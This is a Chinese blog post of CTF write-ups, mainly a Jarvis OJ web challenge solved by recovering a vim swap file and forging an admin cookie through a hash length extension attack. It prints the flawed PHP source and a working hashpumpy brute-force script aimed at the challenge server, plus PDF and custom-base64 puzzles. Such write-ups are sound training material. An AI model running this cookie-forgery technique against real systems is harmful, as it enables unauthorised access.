<h3 id="flag在管理员手里"><a href="#flag在管理员手里" class="headerlink" title="flag在管理员手里"></a>flag在管理员手里</h3><p>看到这样只允许admin访问的页面，看看响应包<br><img src="https://img-blog.csdnimg.cn/20200919173250610.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70#pic_center" alt="m0re" loading="lazy"><br>设置了cookie，是guest用户的，如果是admin的怎么修改？<br>尝试简单修改一下，结果很正常的失败了。<br>然后还进行了爆破，看看有无其他敏感文件和目录。<br><img src="https://img-blog.csdnimg.cn/20200919173046638.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70#pic_center" alt="m0re" loading="lazy"><br>然后发现<code>index.php~</code>是可以访问的。是一个文件，应该是泄露数据。<br>但是打开是乱码，所以就拉到kali中使用file命令查看一下文件类型<br>发现是一个swap文件，是vim的，所以使用vim打开，但是还是乱码，尝试直接cat该文件<br><img src="https://img-blog.csdnimg.cn/20200919175153236.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70#pic_center" alt="m0re" loading="lazy"><br>发现了内容，但是不是很直观。所以查到了该文件类型，是可复原的文件<br><img src="https://img-blog.csdnimg.cn/20200919175411317.png#pic_center" alt="m0re" loading="lazy"><br>所以可以使用<code>vim -r</code>来恢复数据<br>得到源码</p>
<pre class="language-php" data-language="php"><code class="language-php"><span class="token prolog">&lt;?php 		
	$auth = false;
	$role = "guest";
	$salt = 		
	if (isset($_COOKIE["role"])) &#123;
			$role = unserialize($_COOKIE["role"]);			
			$hsh = $_COOKIE["hsh"];			
			if ($role==="admin" &amp;&amp; $hsh ===md5($salt.strrev($_COOKIE["role"]))) &#123;
					$auth = true;
			&#125; else &#123;
					$auth = false;			
			&#125;		
	&#125; else &#123;			
			$s = serialize($role);			
			setcookie('role',$s);			
			$hsh = md5($salt.strrev($s));			
			setcookie('hsh',$hsh);		
	&#125;		
	if ($auth) &#123;			
			echo "&lt;h3>Welcome Admin. Your flag is 		
	&#125; else &#123;			
			echo "&lt;h3>Only Admin can see the flag!!&lt;/h3>";		&#125;	
?></span></code></pre>
<p>查阅资料发现是哈希长度拓展攻击，<br>由于不知道<code>$salt</code>的长度，所以要进行爆破，需要用到一个工具<br>hashpumpy，安装方法——<code>https://www.cnblogs.com/pcat/p/5478509.html</code><br>爆破脚本：</p>
<pre class="language-python" data-language="python"><code class="language-python"><span class="token keyword">import</span> requests<span class="token punctuation">,</span>hashpumpy<span class="token punctuation">,</span>urllib


<span class="token keyword">def</span> <span class="token function">attack</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
    url <span class="token operator">=</span> <span class="token string">'http://web.jarvisoj.com:32778/'</span>

    old_cookie <span class="token operator">=</span> <span class="token string">'3a4727d57463f122833d9e732f94e4e0'</span>
    str1 <span class="token operator">=</span> <span class="token string">'s:5:"guest";'</span>
    str2 <span class="token operator">=</span> <span class="token string">'s:5:"admin";'</span>
    str1 <span class="token operator">=</span> str1<span class="token punctuation">[</span><span class="token punctuation">:</span><span class="token punctuation">:</span><span class="token operator">-</span><span class="token number">1</span><span class="token punctuation">]</span>                           <span class="token comment">#倒过来,这道题要role的值反过来求md5</span>
    str2 <span class="token operator">=</span> str2<span class="token punctuation">[</span><span class="token punctuation">:</span><span class="token punctuation">:</span><span class="token operator">-</span><span class="token number">1</span><span class="token punctuation">]</span>

    <span class="token keyword">for</span> i <span class="token keyword">in</span> <span class="token builtin">range</span><span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">,</span><span class="token number">20</span><span class="token punctuation">)</span><span class="token punctuation">:</span>                       <span class="token comment">#用于爆破salt的长度</span>
        new_cookie<span class="token punctuation">,</span>message <span class="token operator">=</span> hashpumpy<span class="token punctuation">.</span>hashpump<span class="token punctuation">(</span>old_cookie<span class="token punctuation">,</span>str1<span class="token punctuation">,</span>str2<span class="token punctuation">,</span>i<span class="token punctuation">)</span>
        payload <span class="token operator">=</span> <span class="token punctuation">&#123;</span><span class="token string">'role'</span><span class="token punctuation">:</span>urllib<span class="token punctuation">.</span>parse<span class="token punctuation">.</span>quote<span class="token punctuation">(</span>message<span class="token punctuation">[</span><span class="token punctuation">:</span><span class="token punctuation">:</span><span class="token operator">-</span><span class="token number">1</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">,</span><span class="token string">'hsh'</span><span class="token punctuation">:</span>new_cookie<span class="token punctuation">&#125;</span>           <span class="token comment">#quote()可以把 \x00 变成 %00</span>
        ans <span class="token operator">=</span> requests<span class="token punctuation">.</span>get<span class="token punctuation">(</span>url<span class="token punctuation">,</span>cookies <span class="token operator">=</span> payload<span class="token punctuation">)</span>
        <span class="token keyword">print</span><span class="token punctuation">(</span>i<span class="token punctuation">)</span>
        <span class="token keyword">print</span><span class="token punctuation">(</span>ans<span class="token punctuation">.</span>text<span class="token punctuation">)</span>
        <span class="token keyword">if</span> <span class="token string">'welcome'</span> <span class="token keyword">in</span> ans<span class="token punctuation">.</span>text<span class="token punctuation">:</span>
            <span class="token keyword">print</span><span class="token punctuation">(</span>ans<span class="token punctuation">.</span>text<span class="token punctuation">)</span>

<span class="token comment">#print(urllib.parse.quote('\x00'))</span>
attack<span class="token punctuation">(</span><span class="token punctuation">)</span></code></pre>
<p>运行结果</p>
<pre class="language-bash" data-language="bash"><code class="language-bash"><span class="token number">12</span>
<span class="token operator">&lt;</span><span class="token operator">!</span>DOCTYPE html<span class="token operator">></span>
<span class="token operator">&lt;</span>html<span class="token operator">></span>
<span class="token operator">&lt;</span>head<span class="token operator">></span>
<span class="token operator">&lt;</span>title<span class="token operator">></span>Web <span class="token number">35</span><span class="token operator"><span class="token file-descriptor important">0</span>&lt;</span>/title<span class="token operator">></span>
<span class="token operator">&lt;</span>style <span class="token assign-left variable">type</span><span class="token operator">=</span><span class="token string">"text/css"</span><span class="token operator">></span>
	body <span class="token punctuation">&#123;</span>
		background:gray<span class="token punctuation">;</span>
		text-align:center<span class="token punctuation">;</span>
	<span class="token punctuation">&#125;</span>
<span class="token operator">&lt;</span>/style<span class="token operator">></span>
<span class="token operator">&lt;</span>/head<span class="token operator">></span>

<span class="token operator">&lt;</span>body<span class="token operator">></span>
	<span class="token operator">&lt;</span>h<span class="token operator"><span class="token file-descriptor important">3</span>></span>Welcome Admin. Your flag is PCTF<span class="token punctuation">&#123;</span>H45h_ext3ndeR_i5_easy_to_us3<span class="token punctuation">&#125;</span> <span class="token operator">&lt;</span>/h<span class="token operator"><span class="token file-descriptor important">3</span>></span>
<span class="token operator">&lt;</span>/body<span class="token operator">></span>
<span class="token operator">&lt;</span>/html<span class="token operator">></span></code></pre>

<h3 id="爬"><a href="#爬" class="headerlink" title="爬"></a>爬</h3><p>下载，在010editor中看到是PDF文件，但是flag被图片挡住了，所以需要编辑PDF进行移开，这里使用金山PDF进行编辑，因为其他的没试过，听说不行。所以专门下载了一个金山PDF独立版的。<br /><img src="https://img-blog.csdnimg.cn/img_convert/7fbb2c9e1294aabdbb27cae10cd2c772.png" alt="image.png" loading="lazy"><br />可以看到下面的字符串了，进行hex转str<br /><img src="https://img-blog.csdnimg.cn/img_convert/aaf782b45e2b0847707dbd33e933ecd8.png" alt="image.png" loading="lazy"><br><code>wctf2020&#123;th1s_1s_@_pdf_and_y0u_can_use_phot0sh0p&#125;</code></p>
<h3 id="这是base"><a href="#这是base" class="headerlink" title="这是base??"></a>这是base??</h3><pre class="language-bash" data-language="bash"><code class="language-bash">dict:<span class="token punctuation">&#123;</span><span class="token number">0</span>: <span class="token string">'J'</span>, <span class="token number">1</span>: <span class="token string">'K'</span>, <span class="token number">2</span>: <span class="token string">'L'</span>, <span class="token number">3</span>: <span class="token string">'M'</span>, <span class="token number">4</span>: <span class="token string">'N'</span>, <span class="token number">5</span>: <span class="token string">'O'</span>, <span class="token number">6</span>: <span class="token string">'x'</span>, <span class="token number">7</span>: <span class="token string">'y'</span>, <span class="token number">8</span>: <span class="token string">'U'</span>, <span class="token number">9</span>: <span class="token string">'V'</span>, <span class="token number">10</span>: <span class="token string">'z'</span>, <span class="token number">11</span>: <span class="token string">'A'</span>, <span class="token number">12</span>: <span class="token string">'B'</span>, <span class="token number">13</span>: <span class="token string">'C'</span>, <span class="token number">14</span>: <span class="token string">'D'</span>, <span class="token number">15</span>: <span class="token string">'E'</span>, <span class="token number">16</span>: <span class="token string">'F'</span>, <span class="token number">17</span>: <span class="token string">'G'</span>, <span class="token number">18</span>: <span class="token string">'H'</span>, <span class="token number">19</span>: <span class="token string">'7'</span>, <span class="token number">20</span>: <span class="token string">'8'</span>, <span class="token number">21</span>: <span class="token string">'9'</span>, <span class="token number">22</span>: <span class="token string">'P'</span>, <span class="token number">23</span>: <span class="token string">'Q'</span>, <span class="token number">24</span>: <span class="token string">'I'</span>, <span class="token number">25</span>: <span class="token string">'a'</span>, <span class="token number">26</span>: <span class="token string">'b'</span>, <span class="token number">27</span>: <span class="token string">'c'</span>, <span class="token number">28</span>: <span class="token string">'d'</span>, <span class="token number">29</span>: <span class="token string">'e'</span>, <span class="token number">30</span>: <span class="token string">'f'</span>, <span class="token number">31</span>: <span class="token string">'g'</span>, <span class="token number">32</span>: <span class="token string">'h'</span>, <span class="token number">33</span>: <span class="token string">'i'</span>, <span class="token number">34</span>: <span class="token string">'j'</span>, <span class="token number">35</span>: <span class="token string">'k'</span>, <span class="token number">36</span>: <span class="token string">'l'</span>, <span class="token number">37</span>: <span class="token string">'m'</span>, <span class="token number">38</span>: <span class="token string">'W'</span>, <span class="token number">39</span>: <span class="token string">'X'</span>, <span class="token number">40</span>: <span class="token string">'Y'</span>, <span class="token number">41</span>: <span class="token string">'Z'</span>, <span class="token number">42</span>: <span class="token string">'0'</span>, <span class="token number">43</span>: <span class="token string">'1'</span>, <span class="token number">44</span>: <span class="token string">'2'</span>, <span class="token number">45</span>: <span class="token string">'3'</span>, <span class="token number">46</span>: <span class="token string">'4'</span>, <span class="token number">47</span>: <span class="token string">'5'</span>, <span class="token number">48</span>: <span class="token string">'6'</span>, <span class="token number">49</span>: <span class="token string">'R'</span>, <span class="token number">50</span>: <span class="token string">'S'</span>, <span class="token number">51</span>: <span class="token string">'T'</span>, <span class="token number">52</span>: <span class="token string">'n'</span>, <span class="token number">53</span>: <span class="token string">'o'</span>, <span class="token number">54</span>: <span class="token string">'p'</span>, <span class="token number">55</span>: <span class="token string">'q'</span>, <span class="token number">56</span>: <span class="token string">'r'</span>, <span class="token number">57</span>: <span class="token string">'s'</span>, <span class="token number">58</span>: <span class="token string">'t'</span>, <span class="token number">59</span>: <span class="token string">'u'</span>, <span class="token number">60</span>: <span class="token string">'v'</span>, <span class="token number">61</span>: <span class="token string">'w'</span>, <span class="token number">62</span>: <span class="token string">'+'</span>, <span class="token number">63</span>: <span class="token string">'/'</span>, <span class="token number">64</span>: <span class="token string">'='</span><span class="token punctuation">&#125;</span>

chipertext:
FlZNfnF6Qol6e9w17WwQQoGYBQCgIkGTa9w3IQKw</code></pre>
<p>dict原本以为是字典，需要一个一个对照，做了一遍发现不是这样的。<br />64个字符，base64………..emmm=.=<br /><img src="https://img-blog.csdnimg.cn/img_convert/007c86e5dc85b9054c72248f188b8b5e.png" alt="image.png" loading="lazy">转换表显示63个，第64个是“=”<br />使用python写个脚本的话，参考一下python字典<br /><img src="https://img-blog.csdnimg.cn/img_convert/ff68583c230f3a14bf5069078c050e44.png" alt="image.png" loading="lazy"><br />所以参考大佬的脚本，写了一下</p>
<pre class="language-python" data-language="python"><code class="language-python"><span class="token keyword">import</span> base64
<span class="token builtin">dict</span><span class="token operator">=</span><span class="token punctuation">&#123;</span><span class="token number">0</span><span class="token punctuation">:</span> <span class="token string">'J'</span><span class="token punctuation">,</span> <span class="token number">1</span><span class="token punctuation">:</span> <span class="token string">'K'</span><span class="token punctuation">,</span> <span class="token number">2</span><span class="token punctuation">:</span> <span class="token string">'L'</span><span class="token punctuation">,</span> <span class="token number">3</span><span class="token punctuation">:</span> <span class="token string">'M'</span><span class="token punctuation">,</span> <span class="token number">4</span><span class="token punctuation">:</span> <span class="token string">'N'</span><span class="token punctuation">,</span> <span class="token number">5</span><span class="token punctuation">:</span> <span class="token string">'O'</span><span class="token punctuation">,</span> <span class="token number">6</span><span class="token punctuation">:</span> <span class="token string">'x'</span><span class="token punctuation">,</span> <span class="token number">7</span><span class="token punctuation">:</span> <span class="token string">'y'</span><span class="token punctuation">,</span> <span class="token number">8</span><span class="token punctuation">:</span> <span class="token string">'U'</span><span class="token punctuation">,</span> <span class="token number">9</span><span class="token punctuation">:</span> <span class="token string">'V'</span><span class="token punctuation">,</span> <span class="token number">10</span><span class="token punctuation">:</span> <span class="token string">'z'</span><span class="token punctuation">,</span> <span class="token number">11</span><span class="token punctuation">:</span> <span class="token string">'A'</span><span class="token punctuation">,</span> <span class="token number">12</span><span class="token punctuation">:</span> <span class="token string">'B'</span><span class="token punctuation">,</span> <span class="token number">13</span><span class="token punctuation">:</span> <span class="token string">'C'</span><span class="token punctuation">,</span> <span class="token number">14</span><span class="token punctuation">:</span> <span class="token string">'D'</span><span class="token punctuation">,</span> <span class="token number">15</span><span class="token punctuation">:</span> <span class="token string">'E'</span><span class="token punctuation">,</span> <span class="token number">16</span><span class="token punctuation">:</span> <span class="token string">'F'</span><span class="token punctuation">,</span> <span class="token number">17</span><span class="token punctuation">:</span> <span class="token string">'G'</span><span class="token punctuation">,</span> <span class="token number">18</span><span class="token punctuation">:</span> <span class="token string">'H'</span><span class="token punctuation">,</span> <span class="token number">19</span><span class="token punctuation">:</span> <span class="token string">'7'</span><span class="token punctuation">,</span> <span class="token number">20</span><span class="token punctuation">:</span> <span class="token string">'8'</span><span class="token punctuation">,</span> <span class="token number">21</span><span class="token punctuation">:</span> <span class="token string">'9'</span><span class="token punctuation">,</span> <span class="token number">22</span><span class="token punctuation">:</span> <span class="token string">'P'</span><span class="token punctuation">,</span> <span class="token number">23</span><span class="token punctuation">:</span> <span class="token string">'Q'</span><span class="token punctuation">,</span> <span class="token number">24</span><span class="token punctuation">:</span> <span class="token string">'I'</span><span class="token punctuation">,</span> <span class="token number">25</span><span class="token punctuation">:</span> <span class="token string">'a'</span><span class="token punctuation">,</span> <span class="token number">26</span><span class="token punctuation">:</span> <span class="token string">'b'</span><span class="token punctuation">,</span> <span class="token number">27</span><span class="token punctuation">:</span> <span class="token string">'c'</span><span class="token punctuation">,</span> <span class="token number">28</span><span class="token punctuation">:</span> <span class="token string">'d'</span><span class="token punctuation">,</span> <span class="token number">29</span><span class="token punctuation">:</span> <span class="token string">'e'</span><span class="token punctuation">,</span> <span class="token number">30</span><span class="token punctuation">:</span> <span class="token string">'f'</span><span class="token punctuation">,</span> <span class="token number">31</span><span class="token punctuation">:</span> <span class="token string">'g'</span><span class="token punctuation">,</span> <span class="token number">32</span><span class="token punctuation">:</span> <span class="token string">'h'</span><span class="token punctuation">,</span> <span class="token number">33</span><span class="token punctuation">:</span> <span class="token string">'i'</span><span class="token punctuation">,</span> <span class="token number">34</span><span class="token punctuation">:</span> <span class="token string">'j'</span><span class="token punctuation">,</span> <span class="token number">35</span><span class="token punctuation">:</span> <span class="token string">'k'</span><span class="token punctuation">,</span> <span class="token number">36</span><span class="token punctuation">:</span> <span class="token string">'l'</span><span class="token punctuation">,</span> <span class="token number">37</span><span class="token punctuation">:</span> <span class="token string">'m'</span><span class="token punctuation">,</span> <span class="token number">38</span><span class="token punctuation">:</span> <span class="token string">'W'</span><span class="token punctuation">,</span> <span class="token number">39</span><span class="token punctuation">:</span> <span class="token string">'X'</span><span class="token punctuation">,</span> <span class="token number">40</span><span class="token punctuation">:</span> <span class="token string">'Y'</span><span class="token punctuation">,</span> <span class="token number">41</span><span class="token punctuation">:</span> <span class="token string">'Z'</span><span class="token punctuation">,</span> <span class="token number">42</span><span class="token punctuation">:</span> <span class="token string">'0'</span><span class="token punctuation">,</span> <span class="token number">43</span><span class="token punctuation">:</span> <span class="token string">'1'</span><span class="token punctuation">,</span> <span class="token number">44</span><span class="token punctuation">:</span> <span class="token string">'2'</span><span class="token punctuation">,</span> <span class="token number">45</span><span class="token punctuation">:</span> <span class="token string">'3'</span><span class="token punctuation">,</span> <span class="token number">46</span><span class="token punctuation">:</span> <span class="token string">'4'</span><span class="token punctuation">,</span> <span class="token number">47</span><span class="token punctuation">:</span> <span class="token string">'5'</span><span class="token punctuation">,</span> <span class="token number">48</span><span class="token punctuation">:</span> <span class="token string">'6'</span><span class="token punctuation">,</span> <span class="token number">49</span><span class="token punctuation">:</span> <span class="token string">'R'</span><span class="token punctuation">,</span> <span class="token number">50</span><span class="token punctuation">:</span> <span class="token string">'S'</span><span class="token punctuation">,</span> <span class="token number">51</span><span class="token punctuation">:</span> <span class="token string">'T'</span><span class="token punctuation">,</span> <span class="token number">52</span><span class="token punctuation">:</span> <span class="token string">'n'</span><span class="token punctuation">,</span> <span class="token number">53</span><span class="token punctuation">:</span> <span class="token string">'o'</span><span class="token punctuation">,</span> <span class="token number">54</span><span class="token punctuation">:</span> <span class="token string">'p'</span><span class="token punctuation">,</span> <span class="token number">55</span><span class="token punctuation">:</span> <span class="token string">'q'</span><span class="token punctuation">,</span> <span class="token number">56</span><span class="token punctuation">:</span> <span class="token string">'r'</span><span class="token punctuation">,</span> <span class="token number">57</span><span class="token punctuation">:</span> <span class="token string">'s'</span><span class="token punctuation">,</span> <span class="token number">58</span><span class="token punctuation">:</span> <span class="token string">'t'</span><span class="token punctuation">,</span> <span class="token number">59</span><span class="token punctuation">:</span> <span class="token string">'u'</span><span class="token punctuation">,</span> <span class="token number">60</span><span class="token punctuation">:</span> <span class="token string">'v'</span><span class="token punctuation">,</span> <span class="token number">61</span><span class="token punctuation">:</span> <span class="token string">'w'</span><span class="token punctuation">,</span> <span class="token number">62</span><span class="token punctuation">:</span> <span class="token string">'+'</span><span class="token punctuation">,</span> <span class="token number">63</span><span class="token punctuation">:</span> <span class="token string">'/'</span><span class="token punctuation">,</span> <span class="token number">64</span><span class="token punctuation">:</span> <span class="token string">'='</span><span class="token punctuation">&#125;</span>
base64_list <span class="token operator">=</span> <span class="token punctuation">[</span><span class="token string">'A'</span><span class="token punctuation">,</span> <span class="token string">'B'</span><span class="token punctuation">,</span> <span class="token string">'C'</span><span class="token punctuation">,</span> <span class="token string">'D'</span><span class="token punctuation">,</span> <span class="token string">'E'</span><span class="token punctuation">,</span> <span class="token string">'F'</span><span class="token punctuation">,</span> <span class="token string">'G'</span><span class="token punctuation">,</span> <span class="token string">'H'</span><span class="token punctuation">,</span> <span class="token string">'I'</span><span class="token punctuation">,</span> <span class="token string">'J'</span><span class="token punctuation">,</span> <span class="token string">'K'</span><span class="token punctuation">,</span> <span class="token string">'L'</span><span class="token punctuation">,</span> <span class="token string">'M'</span><span class="token punctuation">,</span> <span class="token string">'N'</span><span class="token punctuation">,</span> <span class="token string">'O'</span><span class="token punctuation">,</span> <span class="token string">'P'</span><span class="token punctuation">,</span><span class="token string">'Q'</span><span class="token punctuation">,</span> <span class="token string">'R'</span><span class="token punctuation">,</span> <span class="token string">'S'</span><span class="token punctuation">,</span> <span class="token string">'T'</span><span class="token punctuation">,</span> <span class="token string">'U'</span><span class="token punctuation">,</span> <span class="token string">'V'</span><span class="token punctuation">,</span> <span class="token string">'W'</span><span class="token punctuation">,</span> <span class="token string">'X'</span><span class="token punctuation">,</span> <span class="token string">'Y'</span><span class="token punctuation">,</span> <span class="token string">'Z'</span><span class="token punctuation">,</span> <span class="token string">'a'</span><span class="token punctuation">,</span> <span class="token string">'b'</span><span class="token punctuation">,</span> <span class="token string">'c'</span><span class="token punctuation">,</span> <span class="token string">'d'</span><span class="token punctuation">,</span> <span class="token string">'e'</span><span class="token punctuation">,</span> <span class="token string">'f'</span><span class="token punctuation">,</span><span class="token string">'g'</span><span class="token punctuation">,</span> <span class="token string">'h'</span><span class="token punctuation">,</span> <span class="token string">'i'</span><span class="token punctuation">,</span> <span class="token string">'j'</span><span class="token punctuation">,</span> <span class="token string">'k'</span><span class="token punctuation">,</span> <span class="token string">'l'</span><span class="token punctuation">,</span> <span class="token string">'m'</span><span class="token punctuation">,</span> <span class="token string">'n'</span><span class="token punctuation">,</span> <span class="token string">'o'</span><span class="token punctuation">,</span> <span class="token string">'p'</span><span class="token punctuation">,</span> <span class="token string">'q'</span><span class="token punctuation">,</span> <span class="token string">'r'</span><span class="token punctuation">,</span> <span class="token string">'s'</span><span class="token punctuation">,</span> <span class="token string">'t'</span><span class="token punctuation">,</span> <span class="token string">'u'</span><span class="token punctuation">,</span> <span class="token string">'v'</span><span class="token punctuation">,</span><span class="token string">'w'</span><span class="token punctuation">,</span> <span class="token string">'x'</span><span class="token punctuation">,</span> <span class="token string">'y'</span><span class="token punctuation">,</span> <span class="token string">'z'</span><span class="token punctuation">,</span> <span class="token string">'0'</span><span class="token punctuation">,</span> <span class="token string">'1'</span><span class="token punctuation">,</span> <span class="token string">'2'</span><span class="token punctuation">,</span> <span class="token string">'3'</span><span class="token punctuation">,</span> <span class="token string">'4'</span><span class="token punctuation">,</span> <span class="token string">'5'</span><span class="token punctuation">,</span> <span class="token string">'6'</span><span class="token punctuation">,</span> <span class="token string">'7'</span><span class="token punctuation">,</span> <span class="token string">'8'</span><span class="token punctuation">,</span> <span class="token string">'9'</span><span class="token punctuation">,</span> <span class="token string">'+'</span><span class="token punctuation">,</span> <span class="token string">'/'</span><span class="token punctuation">]</span>
cipher<span class="token operator">=</span><span class="token string">'FlZNfnF6Qol6e9w17WwQQoGYBQCgIkGTa9w3IQKw'</span>
m0re<span class="token operator">=</span><span class="token string">''</span>
<span class="token keyword">for</span> i <span class="token keyword">in</span> <span class="token builtin">range</span><span class="token punctuation">(</span><span class="token builtin">len</span><span class="token punctuation">(</span>cipher<span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
    <span class="token keyword">for</span> j <span class="token keyword">in</span> <span class="token builtin">range</span><span class="token punctuation">(</span><span class="token number">64</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
        <span class="token keyword">if</span><span class="token punctuation">(</span><span class="token builtin">dict</span><span class="token punctuation">[</span>j<span class="token punctuation">]</span><span class="token operator">==</span>cipher<span class="token punctuation">[</span>i<span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
            m0re<span class="token operator">+=</span>base64_list<span class="token punctuation">[</span>j<span class="token punctuation">]</span>
<span class="token keyword">print</span><span class="token punctuation">(</span>m0re<span class="token punctuation">)</span>
flag<span class="token operator">=</span>base64<span class="token punctuation">.</span>b64decode<span class="token punctuation">(</span>m0re<span class="token punctuation">)</span>
<span class="token keyword">print</span><span class="token punctuation">(</span>flag<span class="token punctuation">)</span></code></pre>
<p><img src="https://img-blog.csdnimg.cn/img_convert/898b053e7e5b53038f1cd46d0f4887d6.png" alt="image.png" loading="lazy"><br /></p>
</div><div id="reward-container"><span class="hty-icon-button button-glow" id="reward-button" title="打赏" onclick="var qr = document.getElementById(&quot;qr&quot;); qr.style.display = (qr.style.display === &quot;none&quot;) ? &quot;block&quot; : &quot;none&quot;;"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-hand-coin-line"></use></svg></span><div id="reward-comment">I'm so cute. Please give me a candy.</div><div id="qr" style="display:none;"><div style="display:inline-block"><a target="_blank" rel="noopener" href="https://gitee.com/m0re/picture/raw/master/img/wechatpay.jpg"><img loading="lazy" src="https://gitee.com/m0re/picture/raw/master/img/wechatpay.jpg" alt="微信支付" title="微信支付"></a><div><span style="color:#2DC100"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-wechat-pay-line"></use></svg></span></div></div></div></div><ul class="post-copyright"><li class="post-copyright-author"><strong>本文作者：</strong>m0re</li><li class="post-copyright-link"><strong>本文链接：</strong><a href="https://m0re.top/posts/d477b3b0/" title="Jarvis OJ—Web">https://m0re.top/posts/d477b3b0/</a></li><li class="post-copyright-license"><strong>版权声明：</strong>本博客所有文章除特别声明外，均默认采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" target="_blank" rel="noopener" title="CC BY-NC-SA 4.0 "><svg class="icon"><use xlink:href="#icon-creative-commons-line"></use></svg><svg class="icon"><use xlink:href="#icon-creative-commons-by-line"></use></svg><svg class="icon"><use xlink:href="#icon-creative-commons-nc-line"></use></svg><svg class="icon"><use xlink:href="#icon-creative-commons-sa-line"></use></svg></a> 许可协议。</li></ul></section></article><div class="post-nav"><div class="post-nav-item"><a class="post-nav-prev" href="/posts/2bb1b5bf/" rel="prev" title="一次不一样的文件上传"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-arrow-left-s-line"></use></svg><span class="post-nav-text">一次不一样的文件上传</span></a></div><div class="post-nav-item"><a class="post-nav-next" href="/posts/47c2548a/" rel="next" title="2020羊城杯、第六届工控比赛部分题目复现"><span class="post-nav-text">2020羊城杯、第六届工控比赛部分题目复现</span><svg class="icon" aria-hidden="true"><use xlink:href="#icon-arrow-right-s-line"></use></svg></a></div></div></div><div class="hty-card" id="comment"><div class="comment-tooltip text-center"><span>尝试使用 utterances （基于 GitHub Issues）评论系统。</span><br><span>您可以点击下方按钮切换对应评论系统，</span><br><span><script>function showUtterances(){ document.querySelector(".utterances").style.display='block'; document.querySelector('#valine-container').style.display='none'; }function showValine(){ document.querySelector('#valine-container').style.display='block'; document.querySelector(".utterances").style.display='none'; }</script></span><br><span><a class="hty-button hty-button--raised" onclick="showValine()">Valine</a><a class="hty-button hty-button--raised" onclick="showUtterances()">utterances</a></span><br><span><style>.utterances{display:none;}</style></span><br></div><div id="valine-container"></div><script>Yun.utils.getScript("https://cdn.jsdelivr.net/npm/valine@latest/dist/Valine.min.js", () => {
  const valineConfig = {"enable":true,"appId":"gUEA9zKLhCnMFxQI5kI20WiD-gzGzoHsz","appKey":"GQKAp04LNloy3MrDMv86MI3i","placeholder":"评论一下~&nbsp_(:з」∠)_ （填写邮箱可以收到回复通知～）","avatar":null,"pageSize":10,"visitor":true,"highlight":true,"recordIP":true,"enableQQ":true,"requiredFields":["nick","mail"],"el":"#valine-container","lang":"zh-cn"}
  valineConfig.path = "/posts/d477b3b0/"
  new Valine(valineConfig)
}, window.Valine);</script></div></main><footer class="sidebar-translate" id="footer"><div class="beian"><a rel="noopener" href="https://beian.miit.gov.cn/" target="_blank">豫ICP备2020025591号-1</a></div><div class="copyright"><span>&copy; 2020 – 2022 </span><span class="with-love" id="animate"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-cloud-line"></use></svg></span><span class="author"> m0re</span></div><div class="powered"><span>由 <a href="https://hexo.io" target="_blank" rel="noopener">Hexo</a> 驱动 v5.1.0</span><span class="footer-separator">|</span><span>主题 - <a rel="noopener" href="https://github.com/YunYouJun/hexo-theme-yun" target="_blank"><span>Yun</span></a> v1.6.1</span></div><div class="live_time"><span>本博客已苟延残喘了</span><span id="display_live_time"></span><span class="moe-text">(●'◡'●)</span><script>function blog_live_time() {
  setTimeout(blog_live_time, 1000);
  const start = new Date('2020-02-21T00:00:00');
  const now = new Date();
  const timeDiff = (now.getTime() - start.getTime());
  const msPerMinute = 60 * 1000;
  const msPerHour = 60 * msPerMinute;
  const msPerDay = 24 * msPerHour;
  const passDay = Math.floor(timeDiff / msPerDay);
  const passHour = Math.floor((timeDiff % msPerDay) / 60 / 60 / 1000);
  const passMinute = Math.floor((timeDiff % msPerHour) / 60 / 1000);
  const passSecond = Math.floor((timeDiff % msPerMinute) / 1000);
  display_live_time.innerHTML = " " + passDay + " 天 " + passHour + " 小时 " + passMinute + " 分 " + passSecond + " 秒";
}
blog_live_time();
</script></div><div id="busuanzi"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><span id="busuanzi_container_site_uv" title="总访客量"><span><svg class="icon" aria-hidden="true"><use xlink:href="#icon-user-line"></use></svg></span><span id="busuanzi_value_site_uv"></span></span><span class="footer-separator">|</span><span id="busuanzi_container_site_pv" title="总访问量"><span><svg class="icon" aria-hidden="true"><use xlink:href="#icon-eye-line"></use></svg></span><span id="busuanzi_value_site_pv"></span></span></div></footer><a class="hty-icon-button" id="back-to-top" aria-label="back-to-top" href="#"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-arrow-up-s-line"></use></svg><svg class="progress-circle-container" viewBox="0 0 100 100"><circle class="progress-circle" id="progressCircle" cx="50" cy="50" r="48" fill="none" stroke="#6200ee" stroke-width="2" stroke-linecap="round"></circle></svg></a><a class="popup-trigger hty-icon-button icon-search" id="search" href="javascript:;" title="搜索"><span class="site-state-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-search-line"></use></svg></span></a><script>window.addEventListener("DOMContentLoaded", () => {
  // Handle and trigger popup window
  document.querySelector(".popup-trigger").addEventListener("click", () => {
    document.querySelector(".popup").classList.add("show");
    setTimeout(() => {
      document.querySelector(".search-input").focus();
    }, 100);
  });

  // Monitor main search box
  const onPopupClose = () => {
    document.querySelector(".popup").classList.remove("show");
  };

  document.querySelector(".popup-btn-close").addEventListener("click", () => {
    onPopupClose();
  });

  window.addEventListener("keyup", event => {
    if (event.key === "Escape") {
      onPopupClose();
    }
  });
});
